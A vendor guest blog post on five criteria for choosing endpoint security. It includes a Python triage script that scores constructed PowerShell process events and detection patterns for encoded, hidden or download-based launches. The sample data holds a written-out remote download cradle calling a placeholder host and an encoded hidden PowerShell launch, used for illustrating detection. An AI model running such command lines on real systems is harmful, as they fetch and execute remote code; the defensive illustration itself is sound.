If you could use some help assessing endpoint security suppliers, these five points will ensure you ask the right questions.
It is no news that the cyber threat is growing. With advanced attacks on the rise, the demand for effective security solutions has never been higher. The market is flooded with suppliers who make bold claims and then make even bolder statements in news stories. Even security professionals find it difficult to distinguish fact from fiction. That is why I list the five most important points for you.
1. Viruses are not the only threat
Malware has evolved to much more than just an old-fashioned computer virus. However, most security solutions still have the term "anti-virus" in their name, which often says something about the ability of such solutions to deal with the modern threat.
The reality is that cyber attacks take many forms that have nothing to do with a virus, or even with a file. They range from indiscriminate to highly targeted. They include ransomware, spear phishing and drive-by attacks, and they exploit both software and hardware vulnerabilities that can lead to the loss of customer and company data.
Do not fall into the trap of thinking that your company is too small to be a target. Attackers arm themselves with machine learning to perform highly targeted actions in a scalable way at low cost.
Do not forget that the threat can also come from within; dissatisfied employees know the weaknesses of your systems better than any outsider. Good endpoint security must be able to detect bad behavior regardless of the point of origin.
2. Malicious files are only part of the problem
Old-fashioned security software works by scanning files on the local computer to determine whether they are malicious or not, judging each file by the reputation of its characteristics. Like the term 'anti-virus', this is a very outdated way of protecting a system.
Such solutions have been extended over the years with additional features such as blocking malicious websites or detecting excessive use of resources, in order to combat newly introduced threats. Instead of such a reactive approach, truly effective protection will have to be proactive without strong reliance on reputation-based protection.
Nowadays the vast majority of successful attacks are 'file-less': the infection is set in motion without any file being involved. For example, such attacks change DNS settings to redirect your network traffic, or inject code into everyday, routine processes. An outdated security solution that focuses primarily on scanning for malicious files is well past its expiry date.
3. Confidence as a weak point in the system
Untrustworthy software is not the only danger to your endpoint. Even software from established brands is used to attack your system. Although attacks on MS Office have a long history, macro attacks and DDE-based attacks still exploit vulnerabilities today. Many security solutions overlook such attacks because they appear to come from trusted applications. At the same time, most companies need legitimate PowerShell operations, while PowerShell-based attacks are becoming more and more common.
You need a security solution that is smart enough to distinguish legitimate PowerShell activity from malicious behavior.
Modern malware can also run undetected by traditional security solutions by operating with system-level permissions. This kind of malware makes use of a vulnerability that allows privilege escalation, or of other infection methods. This is possible because many anti-virus solutions grant access on the basis of identity instead of behavior. As long as security solutions keep using such a "whitelisting" approach, the endpoint remains vulnerable to supply chain attacks and forged certificates.
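The two points above (telling legitimate PowerShell activity from malicious behavior, and the weakness of allow-listing by identity) can be made concrete with a small triage routine. The following is an added example written for this article; it is not SentinelOne code and does not describe how any product works. It assumes a hypothetical process-creation log format (`parent|image|signer|command line`), constructed sample events, and invented rule weights and threshold. It shows that an identity-based check passes every event because each process is signed by Microsoft, while a behavior-based score separates the Office-spawned, hidden, encoded PowerShell launch from routine administrative use of the same binary.

```python
"""Behavior-based triage of process-creation events versus identity-based
allow-listing. Added example for this article; not SentinelOne code.
All events, signer names, rule weights and the threshold are constructed."""
import re
from dataclasses import dataclass

# Constructed sample events: parent image | image | code signer | command line
SAMPLE_EVENTS = [
    "explorer.exe|powershell.exe|Microsoft Windows|powershell.exe -File C:\\Scripts\\backup.ps1",
    "WINWORD.EXE|powershell.exe|Microsoft Windows|powershell.exe -NoP -W Hidden -Enc QQBBAEEAQQBBAEEAQQBBAA==",
    "services.exe|powershell.exe|Microsoft Windows|powershell.exe Get-Service",
    "services.exe|powershell.exe|Microsoft Windows|powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\ProgramData\\Inventory\\collect.ps1",
    "outlook.exe|cmd.exe|Microsoft Windows|cmd /c powershell -nop -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"",
]

# Hypothetical trust anchors for the identity-based approach the article criticizes.
TRUSTED_SIGNERS = {"Microsoft Windows", "Microsoft Corporation"}
# Office applications that have no business launching shells in normal use.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass
class ProcessEvent:
    parent: str
    image: str
    signer: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Split one constructed log line into its four fields."""
    parent, image, signer, cmd = line.split("|", 3)
    return ProcessEvent(parent.strip(), image.strip(), signer.strip(), cmd.strip())


def identity_allowed(ev: ProcessEvent) -> bool:
    """Identity-based decision: trust anything carrying a trusted signature."""
    return ev.signer in TRUSTED_SIGNERS


def _cmd_has(pattern: str):
    return lambda ev: re.search(pattern, ev.command_line, re.I) is not None


# (rule name, weight, predicate). Weights are invented for illustration;
# individual flags are common in legitimate scripts, so no single rule is decisive.
RULES = [
    ("office_parent", 3, lambda ev: ev.parent.lower() in OFFICE_PARENTS),
    ("hidden_window", 2, _cmd_has(r"-w(indowstyle)?\s+hidden")),
    ("encoded_command", 2, _cmd_has(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}")),
    ("no_profile", 1, _cmd_has(r"-nop(rofile)?\b")),
    ("policy_bypass", 1, _cmd_has(r"-(ep|ex|executionpolicy)\s+bypass")),
    ("network_fetch", 2, _cmd_has(r"downloadstring|net\.webclient|invoke-webrequest|\biwr\b")),
]
THRESHOLD = 4  # constructed cut-off: combinations of indicators, not lone flags


def behavior_score(ev: ProcessEvent):
    """Return (total score, list of rule names that fired) for one event."""
    hits = [(name, weight) for name, weight, pred in RULES if pred(ev)]
    return sum(w for _, w in hits), [name for name, _ in hits]


def classify(ev: ProcessEvent):
    """Behavior-based verdict plus the evidence behind it."""
    score, hits = behavior_score(ev)
    return ("malicious" if score >= THRESHOLD else "benign"), score, hits


def triage(lines):
    """Compare both approaches over a batch of log lines."""
    results = []
    for line in lines:
        ev = parse_event(line)
        verdict, score, hits = classify(ev)
        results.append({
            "image": ev.image,
            "parent": ev.parent,
            "identity_allowed": identity_allowed(ev),
            "verdict": verdict,
            "score": score,
            "hits": hits,
        })
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"{r['parent']:>13} -> {r['image']:<15} identity_allowed={r['identity_allowed']} "
              f"behavior={r['verdict']} ({r['score']}: {', '.join(r['hits']) or 'no indicators'})")
```

Running the script shows every event as `identity_allowed=True`, because signer identity says nothing about what the process is doing. The behavioral score flags the Word-spawned hidden encoded launch and the Outlook-spawned download, while the backup script and the inventory script, which legitimately use `-NoProfile` and `-ExecutionPolicy Bypass`, stay below the threshold. The weights and cut-off here are deliberately simple; a real product would combine many more signals and tune them against an organisation's own baseline.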
4. The power of simplicity
Security software does not have to be difficult to use, and you should not have to be a security expert to manage it effectively. Unfortunately, many security software providers give the impression that the undoubtedly large complexity 'under the hood' must also lead to a very complex management environment.
Make sure you choose an endpoint solution that keeps maintenance tasks to a minimum, presents those tasks in a clear and easy-to-understand interface, and lets you carry them out with the click of a button.
5. Security is a mindset, not a product
The biggest misconception you can have about security solutions is believing that one product solves all your security problems in one go. Threats take various forms, from random ransomware attacks to dissatisfied employees. What is your action plan when (do not think "if") a threat materialises? How do you respond? The lack of an action plan can cause major damage to your customers, your data and your reputation.
That is why you need an endpoint solution that can be part of your complete action plan. A platform-independent solution such as SentinelOne provides 360-degree insight into the status of your endpoints, including the encrypted traffic within your network, rolls back the effects of an attack with one click, and uses a single, easy-to-use agent.
Eric van Sommeren is Director of Sales Northern Europe for SentinelOne. He shares his passion for endpoint security software as a guest blogger for EASI.